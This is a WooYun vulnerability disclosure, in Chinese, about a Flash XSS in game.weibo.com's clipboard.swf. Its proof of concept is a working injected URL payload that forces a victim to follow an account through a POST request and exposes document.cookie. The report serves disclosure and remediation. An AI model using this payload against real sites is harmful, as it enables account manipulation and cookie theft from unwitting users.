漏洞详情

披露状态:

2014-02-26: 细节已通知厂商并且等待厂商处理中
2014-02-26: 厂商已经确认,细节仅向厂商公开
2014-03-08: 细节向核心白帽子及相关领域专家公开
2014-03-18: 细节向普通白帽子公开
2014-03-28: 细节向实习白帽子公开
2014-04-12: 细节向公众公开

简要描述:

flash漏洞导致可以执行js代码,从而加粉

详细说明:

phpwind的flash漏洞未修复,可以执行js代码,通过发送post请求到相应url即可加分。在我的上一个漏洞( WooYun: 经典flash漏洞导致的微博加粉 )中有相关说明。

漏洞证明:

点击此flash即可加粉

http://game.weibo.com/club//res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf?highlighterId=123\%22))}catch(e){oAjax=new+XMLHttpRequest();oAjax.open('POST','http://game.weibo.com/mobile/message/makeFollow',true);oAjax.setRequestHeader('Content-Type','application/x-www-form-urlencoded');oAjax.send('uid=2721930343');setTimeout(function(){window.location.href='http://game.weibo.com/club/read-671795-1';},2000);alert(document.cookie)}//

修复方案:

更新此flash,或者过滤clipboard.swf接收的highlighterId

版权声明:转载请注明来源 yimi@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-02-26 16:41

厂商回复:

感谢关注新浪安全,马上安排联系相关人员处理

最新状态:

暂无


漏洞评价: